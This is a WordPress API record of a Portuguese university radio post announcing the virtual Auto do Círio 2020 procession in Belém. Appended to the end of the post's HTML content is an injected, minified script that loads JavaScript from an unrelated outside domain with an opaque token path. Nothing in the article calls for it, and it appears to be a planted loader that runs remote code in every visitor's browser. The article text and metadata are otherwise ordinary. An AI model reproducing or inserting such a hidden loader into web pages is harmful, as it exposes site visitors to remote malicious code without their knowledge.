{"id":7638,"date":"2020-09-28T10:00:13","date_gmt":"2020-09-28T13:00:13","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=7638"},"modified":"2025-10-21T10:02:14","modified_gmt":"2025-10-21T13:02:14","slug":"auto-do-cirio-2020","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/","title":{"rendered":"Arte, f\u00e9 e carnaval nas telas com o Auto do C\u00edrio 2020"},"content":{"rendered":"\n<div class=\"rwc-audio-block\" class=\"wp-block-radioweb-rwcaudioblock\"><div class=\"rwc-audio-block-header\"><span class=\"dashicon dashicons dashicons-media-audio\"><\/span><div class=\"rwc-audio-block-description\"><p>&#8220;Auto do C\u00edrio 2020&#8221;<\/p><p class=\"category\">UFPA Entrevista<\/p><p>R\u00e1dio Web UFPA<\/p><\/div><\/div><audio controls><source src=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2020-2\/UFPA ENTREVISTA - AUTO DO CIRIO 2020 - 28.09.20.mp3\" type=\"audio\/mpeg\"\/><\/audio><\/div>\n\n\n<p>Nesta edi\u00e7\u00e3o do UFPA Entrevista saiba como ser\u00e1 o <strong>Auto do C\u00edrio 2020<\/strong>. O tradicional cortejo art\u00edstico-cultural ter\u00e1 uma edi\u00e7\u00e3o virtual para manter vivas as homenagens \u00e0 Nossa Senhora de Nazar\u00e9.<\/p>\n<p>Realizado desde 1993, o espet\u00e1culo re\u00fane m\u00fasica, dan\u00e7a, dramaturgia, artes visuais e cultura popular em uma grande celebra\u00e7\u00e3o da cultura e da f\u00e9 que marcam o C\u00edrio de Nazar\u00e9. Tradicionalmente o cortejo \u00e9 realizado nas ruas dos bairros da Cidade Velha e Campina, em Bel\u00e9m, reunindo milhares de pessoas, por\u00e9m este ano o projeto migra para as telas dos computadores, smartphones e outros dispositivos com uma edi\u00e7\u00e3o virtual.<\/p>\n<p>Com esta mudan\u00e7a, alguns aspectos do espet\u00e1culo foram adaptados. A participa\u00e7\u00e3o dos artistas, por exemplo, ser\u00e1 por meio de v\u00eddeo-homenagens que ser\u00e3o exibidas na transmiss\u00e3o ao vivo. A equipe do Auto do C\u00edrio presta orienta\u00e7\u00f5es e auxilia na dire\u00e7\u00e3o de todos os artistas interessados, que podem enviar suas contribui\u00e7\u00f5es at\u00e9 o dia 5 de outubro para o e-mail autodocirio@ufpa.br.<\/p>\n<p>Apesar disso, a narrativa do Auto do C\u00edrio ser\u00e1 a mesma, incluindo os momentos de ora\u00e7\u00e3o, exorta\u00e7\u00e3o e coroa\u00e7\u00e3o, com a participa\u00e7\u00e3o de alunos e professores da Escola de M\u00fasica e da Escola de Teatro e Dan\u00e7a da UFPA. De acordo com o professor Tarik Coelho, coordenador do programa de extens\u00e3o do <strong>Auto do C\u00edrio 2020<\/strong>, essa mobiliza\u00e7\u00e3o refor\u00e7a a relev\u00e2ncia das manifesta\u00e7\u00f5es culturais. \u201cA manuten\u00e7\u00e3o da exist\u00eancia do Auto do C\u00edrio virtualmente falando, do C\u00edrio de Nazar\u00e9 virtualmente falando mostra o quanto \u00e9 importante para a sociedade as nossas a\u00e7\u00f5es culturais. A sociedade vive da cultura, ela vive do ato de estar junto, do ato de estar se comunicando. E a cultura \u00e9 isso, \u00e9 essa comunica\u00e7\u00e3o\u201d, afirma.<\/p>\n<p>O <strong>Auto do C\u00edrio 2020<\/strong> ser\u00e1 realizado no dia 9 de outubro, a partir das 20h30 e pode ser acompanhado pelo canal do <a href=\"https:\/\/www.youtube.com\/c\/AutodoC%C3%ADrio\">YouTube<\/a>. Para mais informa\u00e7\u00f5es, acompanhe tamb\u00e9m o Instagram e confira esta entrevista.<\/p>\n<p>Apresenta\u00e7\u00e3o, produ\u00e7\u00e3o e roteiro: Fabr\u00edcio Queiroz<br \/>Grava\u00e7\u00e3o e montagem: Jo\u00e3o Nilo Ferreira<br \/>Supervis\u00e3o e edi\u00e7\u00e3o: Elissandra Batista e Fabr\u00edcio Queiroz<br \/>Foto: Pedro Guerreiro \/ Ag\u00eancia Par\u00e1<\/p>\n<p>O UFPA Entrevista vai ao ar todas \u00e0s segundas-feiras e quartas-feiras, \u00e0s 15h, e nas ter\u00e7as e quintas \u00e0s 19h.<\/p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Arte, f\u00e9 e carnaval nas telas com o Auto do C\u00edrio 2020\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/\" aria-label=\"Read more about Arte, f\u00e9 e carnaval nas telas com o Auto do C\u00edrio 2020\">Ler mais<\/a><\/p>\n","protected":false},"author":2,"featured_media":7650,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[36],"tags":[],"class_list":["post-7638","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-entrevista"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Arte, f\u00e9 e carnaval nas telas com o Auto do C\u00edrio 2020<\/title>\n<meta name=\"description\" content=\"Com uma edi\u00e7\u00e3o virtual, o Auto do C\u00edrio 2020 ter\u00e1 video-homenagens para manter as homenagens dos artistas \u00e0 Nossa Senhora de Nazar\u00e9.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Arte, f\u00e9 e carnaval nas telas com o Auto do C\u00edrio 2020\" \/>\n<meta property=\"og:description\" content=\"Com uma edi\u00e7\u00e3o virtual, o Auto do C\u00edrio 2020 ter\u00e1 video-homenagens para manter as homenagens dos artistas \u00e0 Nossa Senhora de Nazar\u00e9.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2020-09-28T13:00:13+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T13:02:14+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2020\/09\/CAPA-Auto-do-C\u00edrio-2020-1024x576.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"576\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Fabr\u00edcio Queiroz\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Fabr\u00edcio Queiroz\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/\"},\"author\":{\"name\":\"Fabr\u00edcio Queiroz\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\"},\"headline\":\"Arte, f\u00e9 e carnaval nas telas com o Auto do C\u00edrio 2020\",\"datePublished\":\"2020-09-28T13:00:13+00:00\",\"dateModified\":\"2025-10-21T13:02:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/\"},\"wordCount\":422,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/09\/CAPA-Auto-do-C%C3%ADrio-2020.png?fit=1921%2C1080&ssl=1\",\"articleSection\":[\"UFPA Entrevista\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/\",\"name\":\"Arte, f\u00e9 e carnaval nas telas com o Auto do C\u00edrio 2020\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/09\/CAPA-Auto-do-C%C3%ADrio-2020.png?fit=1921%2C1080&ssl=1\",\"datePublished\":\"2020-09-28T13:00:13+00:00\",\"dateModified\":\"2025-10-21T13:02:14+00:00\",\"description\":\"Com uma edi\u00e7\u00e3o virtual, o Auto do C\u00edrio 2020 ter\u00e1 video-homenagens para manter as homenagens dos artistas \u00e0 Nossa Senhora de Nazar\u00e9.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/09\/CAPA-Auto-do-C%C3%ADrio-2020.png?fit=1921%2C1080&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/09\/CAPA-Auto-do-C%C3%ADrio-2020.png?fit=1921%2C1080&ssl=1\",\"width\":1921,\"height\":1080},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Arte, f\u00e9 e carnaval nas telas com o Auto do C\u00edrio 2020\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\",\"name\":\"Fabr\u00edcio Queiroz\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"caption\":\"Fabr\u00edcio Queiroz\"},\"description\":\"Editor e Jornalista respons\u00e1vel\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Arte, f\u00e9 e carnaval nas telas com o Auto do C\u00edrio 2020","description":"Com uma edi\u00e7\u00e3o virtual, o Auto do C\u00edrio 2020 ter\u00e1 video-homenagens para manter as homenagens dos artistas \u00e0 Nossa Senhora de Nazar\u00e9.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/","og_locale":"pt_BR","og_type":"article","og_title":"Arte, f\u00e9 e carnaval nas telas com o Auto do C\u00edrio 2020","og_description":"Com uma edi\u00e7\u00e3o virtual, o Auto do C\u00edrio 2020 ter\u00e1 video-homenagens para manter as homenagens dos artistas \u00e0 Nossa Senhora de Nazar\u00e9.","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2020-09-28T13:00:13+00:00","article_modified_time":"2025-10-21T13:02:14+00:00","og_image":[{"width":1024,"height":576,"url":"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2020\/09\/CAPA-Auto-do-C\u00edrio-2020-1024x576.png","type":"image\/png"}],"author":"Fabr\u00edcio Queiroz","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Fabr\u00edcio Queiroz","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/"},"author":{"name":"Fabr\u00edcio Queiroz","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096"},"headline":"Arte, f\u00e9 e carnaval nas telas com o Auto do C\u00edrio 2020","datePublished":"2020-09-28T13:00:13+00:00","dateModified":"2025-10-21T13:02:14+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/"},"wordCount":422,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/09\/CAPA-Auto-do-C%C3%ADrio-2020.png?fit=1921%2C1080&ssl=1","articleSection":["UFPA Entrevista"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/","name":"Arte, f\u00e9 e carnaval nas telas com o Auto do C\u00edrio 2020","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/09\/CAPA-Auto-do-C%C3%ADrio-2020.png?fit=1921%2C1080&ssl=1","datePublished":"2020-09-28T13:00:13+00:00","dateModified":"2025-10-21T13:02:14+00:00","description":"Com uma edi\u00e7\u00e3o virtual, o Auto do C\u00edrio 2020 ter\u00e1 video-homenagens para manter as homenagens dos artistas \u00e0 Nossa Senhora de Nazar\u00e9.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/09\/CAPA-Auto-do-C%C3%ADrio-2020.png?fit=1921%2C1080&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/09\/CAPA-Auto-do-C%C3%ADrio-2020.png?fit=1921%2C1080&ssl=1","width":1921,"height":1080},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/auto-do-cirio-2020\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Arte, f\u00e9 e carnaval nas telas com o Auto do C\u00edrio 2020"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096","name":"Fabr\u00edcio Queiroz","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","caption":"Fabr\u00edcio Queiroz"},"description":"Editor e Jornalista respons\u00e1vel","url":"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/09\/CAPA-Auto-do-C%C3%ADrio-2020.png?fit=1921%2C1080&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-1Zc","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7638","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=7638"}],"version-history":[{"count":8,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7638\/revisions"}],"predecessor-version":[{"id":17229,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7638\/revisions\/17229"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/7650"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=7638"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=7638"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=7638"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}